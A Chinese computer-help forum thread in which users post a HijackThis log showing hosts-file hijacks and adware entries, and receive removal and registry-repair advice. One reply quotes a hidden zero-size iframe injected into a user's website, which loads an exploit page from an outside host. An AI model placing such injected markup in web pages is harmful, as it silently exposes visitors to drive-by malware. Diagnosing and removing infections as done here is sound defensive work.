12   1  /  2  页   跳转

高手帮我看下怎么杀啊

高手帮我看下怎么杀啊

先前 神无 哥哥  叫我扫的这个,现在可以告诉我下怎么杀吗?

当前运行的进程:         
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\HEROSOFT\Hero3000\SYSEXPLR.EXE
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\Yahoo!\ASSIST~1\YLive.exe
C:\WINDOWS\System32\usb.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\conime.exe
E:\杀毒杀毒\RISING\RAV\CCENTER.EXE
e:\杀毒杀毒\rising\rav\Update\RAVXP.EXE
E:\杀毒杀毒\RISING\RAV\Ravmond.exe
E:\杀毒杀毒\RISING\RAV\RavStub.exe
e:\杀毒杀毒\rising\rav\RAVMON.EXE
e:\杀毒杀毒\rising\rav\RAVTIMER.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
e:\杀毒杀毒\rising\rav\RsAgent.exe
C:\WINDOWS\msagent\AgentSvr.exe
F:\新建文件夹\HijackThis1991zww.exe

R3 - URLSearchHook: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll
O1 - Hosts: 218.85.139.122 minisite.qq.com
O1 - Hosts: 218.85.139.122 www.minisite.qq.com
O1 - Hosts: 218.85.139.122 cnww.net
O1 - Hosts: 218.85.139.122 www.cnww.net
O1 - Hosts: 218.85.139.122 zhao123.com
O1 - Hosts: 218.85.139.122 www.zhao123.com
O1 - Hosts: 218.85.139.122 4399.com
O1 - Hosts: 218.85.139.122 www.4399.com
O1 - Hosts: 218.85.139.122 chinagames.net
O1 - Hosts: 218.85.139.122 www.chinagames.net
O1 - Hosts: 218.85.139.122 tiexue.net
O1 - Hosts: 218.85.139.122 www.tiexue.net
O1 - Hosts: 218.85.139.122 qq163.com
O1 - Hosts: 218.85.139.122 www.qq163.com
O1 - Hosts: 218.85.139.122 tt67.com
O1 - Hosts: 218.85.139.122 www.tt67.com
O1 - Hosts: 218.85.139.122 chinamp3.com
O1 - Hosts: 218.85.139.122 www.chinamp3.com
O1 - Hosts: 218.85.139.122 pg168.com
O1 - Hosts: 218.85.139.122 www.pg168.com
O1 - Hosts: 218.85.139.122 yymp3.com
O1 - Hosts: 218.85.139.122 www.yymp3.com
O1 - Hosts: 218.85.139.122 yy138.com
O1 - Hosts: 218.85.139.122 www.yy138.com
O1 - Hosts: 218.85.139.122 dj99.com
O1 - Hosts: 218.85.139.122 www.dj99.com
O1 - Hosts: 218.85.139.122 sogua.com
O1 - Hosts: 218.85.139.122 www.sogua.com
O1 - Hosts: 218.85.139.122 snsn.net
O1 - Hosts: 218.85.139.122 www.snsn.net
O1 - Hosts: 218.85.139.122 flash8.net
O1 - Hosts: 218.85.139.122 www.flash8.net
O1 - Hosts: 218.85.139.122 mop.com
O1 - Hosts: 218.85.139.122 www.mop.com
O1 - Hosts: 218.85.139.122 tianyaclub.com
O1 - Hosts: 218.85.139.122 www.tianyaclub.com
O1 - Hosts: 218.85.139.122 xici.net
O1 - Hosts: 218.85.139.122 www.xici.net
O1 - Hosts: 218.85.139.122 ucanlove.com
O1 - Hosts: 218.85.139.122 www.ucanlove.com
O1 - Hosts: 218.85.139.122 cmfu.com
O1 - Hosts: 218.85.139.122 www.cmfu.com
O1 - Hosts: 218.85.139.122 21red.net
O1 - Hosts: 218.85.139.122 www.21red.net
O1 - Hosts: 218.85.139.122 pconline.com.cn
O1 - Hosts: 218.85.139.122 www.pconline.com.cn
O1 - Hosts: 218.85.139.122 donews.com
O1 - Hosts: 218.85.139.122 www.donews.com
O1 - Hosts: 218.85.139.122 pcauto.com.cn
O1 - Hosts: 218.85.139.122 www.pcauto.com.cn
O1 - Hosts: 218.85.139.122 wo99.com
O1 - Hosts: 218.85.139.122 www.wo99.com
O1 - Hosts: 218.85.139.122 flashempire.com
O1 - Hosts: 218.85.139.122 www.flashempire.com
O1 - Hosts: 218.85.139.122 showgood.tv
O1 - Hosts: 218.85.139.122 www.showgood.tv
O1 - Hosts: 218.85.139.122 flashfan.net
O1 - Hosts: 218.85.139.122 www.flashfan.net
O1 - Hosts: 218.85.139.122 long21.net
O1 - Hosts: 218.85.139.122 www.long21.net
O1 - Hosts: 218.85.139.122 socom
O1 - Hosts: 218.85.139.122 www.socom
O1 - Hosts: 218.85.139.122 flashhome.net
O1 - Hosts: 218.85.139.122 www.flashhome.net
O1 - Hosts: 218.85.139.122 cnflash.net
O1 - Hosts: 218.85.139.122 www.cnflash.net
O1 - Hosts: 218.85.139.122 flashsky.com
O1 - Hosts: 218.85.139.122 www.flashsky.com
O1 - Hosts: 218.85.139.122 hunansky.com
O1 - Hosts: 218.85.139.122 www.hunansky.com
O1 - Hosts: 218.85.139.122 52flash.net
O1 - Hosts: 218.85.139.122 www.52flash.net
O1 - Hosts: 218.85.139.122 flashh.com
O1 - Hosts: 218.85.139.122 www.flashh.com
O1 - Hosts: 218.85.139.122 flashsun.com
O1 - Hosts: 218.85.139.122 www.flashsun.com
O1 - Hosts: 218.85.139.122 7k7k.com
O1 - Hosts: 218.85.139.122 www.7k7k.com
O1 - Hosts: 218.85.139.122 xuanxuan.com
O1 - Hosts: 218.85.139.122 www.xuanxuan.com
O1 - Hosts: 218.85.139.122 flash88.net
O1 - Hosts: 218.85.139.122 www.flash88.net
O1 - Hosts: 218.85.139.122 91flash.com
O1 - Hosts: 218.85.139.122 www.91flash.com
O1 - Hosts: 218.85.139.122 doingflash.com
O1 - Hosts: 218.85.139.122 www.doingflash.com
O1 - Hosts: 218.85.139.122 skyhits.com
O1 - Hosts: 218.85.139.122 www.skyhits.com
O1 - Hosts: 218.85.139.122 ting78.com
O1 - Hosts: 218.85.139.122 www.ting78.com
O1 - Hosts: 218.85.139.122 91.com
O1 - Hosts: 218.85.139.122 www.91.com
O1 - Hosts: 218.85.139.122 flashchina.net
O1 - Hosts: 218.85.139.122 www.flashchina.net
O1 - Hosts: 218.85.139.122 flash8.com.cn
O1 - Hosts: 218.85.139.122 www.flash8.com.cn
O1 - Hosts: 218.85.139.122 f130.net
O1 - Hosts: 218.85.139.122 www.f130.net
O1 - Hosts: 218.85.139.122 chinanim.com
O1 - Hosts: 218.85.139.122 www.chinanim.com
O1 - Hosts: 218.85.139.122 comicer.com
最后编辑2005-11-13 23:08:42
分享到:
gototop
 

O2 - BHO: (no name) - _{0CA51D02-7739-43EA-8D9A-1E8AD4327B03} - (no file)
O2 - BHO: (no name) - _{54EBD53A-9BC1-480B-966A-843A333CA162} - (no file)
O2 - BHO: (no name) - _{62EED7C6-9F02-42f9-B634-98E2899E147B} - (no file)
O2 - BHO: (no name) - _{AA58ED58-01DD-4d91-8333-CF10577473F7} - (no file)
O2 - BHO: ThunderIEHelper Class - {0005A87D-D626-4B3A-84F9-1D9571695F55} - C:\WINDOWS\System32\xunleibho_v8.dll
O2 - BHO: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - D:\PROGRA~1\FLASHGET\jccatch.dll (file missing)
O2 - BHO: IE - {D157330A-9EF3-49F8-9A67-4141AC41ADD4} - C:\WINDOWS\DOWNLO~1\CnsHook.dll
O3 - IE工具栏增项: 电台(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - IE工具栏增项: 雅虎助手 - {406F94F0-504F-4a40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll
O4 - 启动项HKLM\\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - 启动项HKLM\\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - 启动项HKLM\\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - 启动项HKLM\\Run: [SysExplr] C:\HEROSOFT\Hero3000\SYSEXPLR.EXE
O4 - 启动项HKLM\\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
O4 - 启动项HKLM\\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - 启动项HKLM\\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - 启动项HKLM\\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - 启动项HKLM\\Run: [CnsMin] Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32
O4 - 启动项HKLM\\Run: [helper.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\helper.dll,Rundll32
O4 - 启动项HKLM\\Run: [YDTMain.exe] C:\PROGRA~1\YDT\YDTMain.exe
O4 - 启动项HKLM\\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot
O4 - 启动项HKLM\\Run: [YLive.exe] C:\PROGRA~1\Yahoo!\ASSIST~1\YLive.exe
O4 - 启动项HKLM\\Run: [yassistse] "C:\Program Files\Yahoo!\Assistant\yassistse.exe"
O4 - 启动项HKLM\\Run: [zcom] \zPlatform.exe MIN
O4 - 启动项HKLM\\Run: [usb] C:\WINDOWS\System32\usb.exe
O4 - 启动项HKLM\\Run: [RavTimer] E:\杀毒杀毒\RISING\RAV\RAVTIMER.EXE
O4 - 启动项HKLM\\Run: [RavMon] E:\杀毒杀毒\RISING\RAV\RAVMON.EXE -SYSTEM
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Startup: usb.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O9 - 浏览器额外的按钮: 手机短信 - {00000000-0000-0001-0001-596BAEDD1289} - http://sms.3721.com/ie/index.htm (file missing)
O9 - 浏览器额外的按钮: Yahoo 1G电邮 - {507F9113-CD77-4866-BA92-0E86DA3D0B97} - http://cn.mail.yahoo.com/promo/rd1 (file missing)
O9 - 浏览器额外的按钮: 寻宝乐趣多 - {59BC54A2-56B3-44a0-93E5-432D58746E26} - http://hot.3721.com/rd/shop_btn.htm (file missing)
O9 - 浏览器额外的按钮: 上网助手 - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://assistant.3721.com/index.htm?fb=Cns (file missing)
O9 - 浏览器额外的按钮: 情景聊天 - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - http://cn.rd.yahoo.com/home/messenger/bjk/clientbtn/?http://cn.messenger.yahoo.com/ (file missing)
O9 - 浏览器额外的按钮: (no name) - {ECF2E268-F28C-48d2-9AB7-8F69C11CCB71} - http://assistant.3721.com/security1.htm?fb=Cns (file missing)
O9 - 浏览器额外的“工具”菜单项: 修复浏览器 - {ECF2E268-F28C-48d2-9AB7-8F69C11CCB71} - http://assistant.3721.com/security1.htm?fb=Cns (file missing)
O9 - 浏览器额外的按钮: (no name) - {FD00D911-7529-4084-9946-A29F1BDF4FE5} - http://assistant.3721.com/clean1.htm?fb=Cns (file missing)
O9 - 浏览器额外的“工具”菜单项: 清理上网记录 - {FD00D911-7529-4084-9946-A29F1BDF4FE5} - http://assistant.3721.com/clean1.htm?fb=Cns (file missing)
O11 - Options group: [!CNS]  网络实名
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/
O16 - DPF: _{9242BB35-0DB0-43AC-8DFC-8EA07E63B92A} - http://219.133.60.95:1080/qqtv/QQLive1.0Beta02.exe
O16 - DPF: _{C8BD9ACB-F7EC-48E6-BB2F-DAADC6789E9A} - http://211.152.52.102/duba/antiscan/update/OCX/KAVClean.CAB
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://cn.download.zs.yahoo.com/partner/kavwebscan_unicode.cab
O16 - DPF: {45625570-135D-4553-8435-B8716E45ECCA} (CCheckSysInfo Object) - http://fix.lenovo.net/ibisfix/front/(xwgt4w45z12qgx55m4wbwmus)/front/download/AutoFix.cab
O16 - DPF: {5DD731E6-D4F0-11D3-BE3F-00105A6FDA50} (V3ProX Control) - http://origin-www.ahn.com.cn/aspservice/plugin/myv3.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1117770266577
O16 - DPF: {9BBD100C-E820-4930-9937-E8F3AA40E584} (DFVSScanFile Control) - http://antivirus3.sunv.com/dfvsolDown/dfvsol.cab
O16 - DPF: {9BDBC41E-C335-4263-83C0-ECE78EE28A33} (SysMonOCX Control) - http://auth70.ahn.com.cn/aspservice/plugin/myfirewall20.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{43D9BD36-8273-4E10-9D2E-62888B892BE0}: NameServer = 61.139.39.73,61.139.2.69
O17 - HKLM\System\CCS\Services\Tcpip\..\{F379D714-FC57-4340-9199-69C9F709760D}: NameServer = 61.139.39.73 61.139.2.69
O17 - HKLM\System\CS1\Services\Tcpip\..\{43D9BD36-8273-4E10-9D2E-62888B892BE0}: NameServer = 61.139.39.73,61.139.2.69
O17 - HKLM\System\CS2\Services\Tcpip\..\{43D9BD36-8273-4E10-9D2E-62888B892BE0}: NameServer = 61.139.39.73,61.139.2.69
O20 - Winlogon Notify: PCANotify - C:\WINDOWS\SYSTEM32\PCANotify.dll
O23 - NT 服务: pcAnywhere Host Service (awhost32) - Symantec Corporation - C:\Program Files\Symantec\pcAnywhere\awhost32.exe
O23 - NT 服务: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - NT 服务: Rising Process Communication Center (RsCCenter) - rising - E:\杀毒杀毒\RISING\RAV\CCENTER.EXE
O23 - NT 服务: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - E:\杀毒杀毒\RISING\RAV\Ravmond.exe
O23 - NT 服务: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
O23 - NT 服务: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe

gototop
 

可以修复O1和所有(no file)或(file missing)项.
有什么不正常的地方吗?
gototop
 

不正常的就是这个病毒自己改主页,而且删不掉
浏览网页的时候过不了多久也要变成那个网页
gototop
 

O11 - Options group: [!CNS] 网络实名
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/
O16 - DPF: _{9242BB35-0DB0-43AC-8DFC-8EA07E63B92A} - http://219.133.60.95:1080/qqtv/QQLive1.0Beta02.exe
O16 - DPF: _{C8BD9ACB-F7EC-48E6-BB2F-DAADC6789E9A} - http://211.152.52.102/duba/antiscan/update/OCX/KAVClean.CAB
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://cn.download.zs.yahoo.com/partner/kavwebscan_unicode.cab
O16 - DPF: {45625570-135D-4553-8435-B8716E45ECCA} (CCheckSysInfo Object) - http://fix.lenovo.net/ibisfix/front/(xwgt4w45z12qgx55m4wbwmus)/front/download/AutoFix.cab
O16 - DPF: {5DD731E6-D4F0-11D3-BE3F-00105A6FDA50} (V3ProX Control) - http://origin-www.ahn.com.cn/aspservice/plugin/myv3.cab
O16 - DPF: {9BBD100C-E820-4930-9937-E8F3AA40E584} (DFVSScanFile Control) - http://antivirus3.sunv.com/dfvsolDown/dfvsol.cab
O16 - DPF: {9BDBC41E-C335-4263-83C0-ECE78EE28A33} (SysMonOCX Control) - http://auth70.ahn.com.cn/aspservice/plugin/myfirewall20.cab
O20 - Winlogon Notify: PCANotify - C:\WINDOWS\SYSTEM32\PCANotify.dll
修复这几项删除C:\WINDOWS\SYSTEM32\PCANotify.dll文件.
gototop
 

现象描述:一些网站为了提高自己的访问量和做广告宣传,利用IE的漏洞,将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页,为了不让你改回去,甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。
解决办法:1.起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。
注意:有时进行了以上步骤后仍然没有生效,估计是有程序加载到了启动项的缘故,就算修改了,下次启动时也会自动运行程序,将上述设置改回来,解决方法如下:
运行注册表编辑器Regedit.exe,然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键,然后将下面的"registry.exe"子键(名字不固定)删除,最后删除硬盘里的同名可执行程序。退出注册编辑器,重新启动计算机,问题就解决了。
2.默认主页的修改。运行注册表编辑器,展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,将Default-Page-URL子键的键值中的那些恶意网站的网址改正,或者设置为IE的默认值。
3.IE选项按钮失效。运行注册表编辑器,将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改为"0",将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的键值改为"0"。
===============================================
不知会不会对你的题目.
这是我当初从网下下的,已不知原创者了,在此一并谢过.
gototop
 

我自己搞了一个小站,
最近被人加了木马病毒
一点击网站首页或其它页面就会出现病毒:exploit.html.mht.p
在浏览器查看源文件发现第一行被修改加上了如下语句,<iframe src="http://ekin111.go3.icpcn.com/icyfox.htm" name="zhu" width="0" height="0" frameborder="0"></iframe><iframe src="http://ekin111.go3.icpcn.com/icyfox.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>

<html>
但我把网站程序文件从FTP下载到本地磁盘却找不到这段代码,不知是什么原因?请高手们帮忙^^

gototop
 

晕,我删不掉
说是检查磁盘未满或为写保护
未被使用什么的,,,怎么弄啊,神无哥哥?
gototop
 

进安全模式试试,
gototop
 

呵呵,我都觉得自己有点烦人,不过我是菜鸟,不懂就问。。。。怎么进入安全模式啊???
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT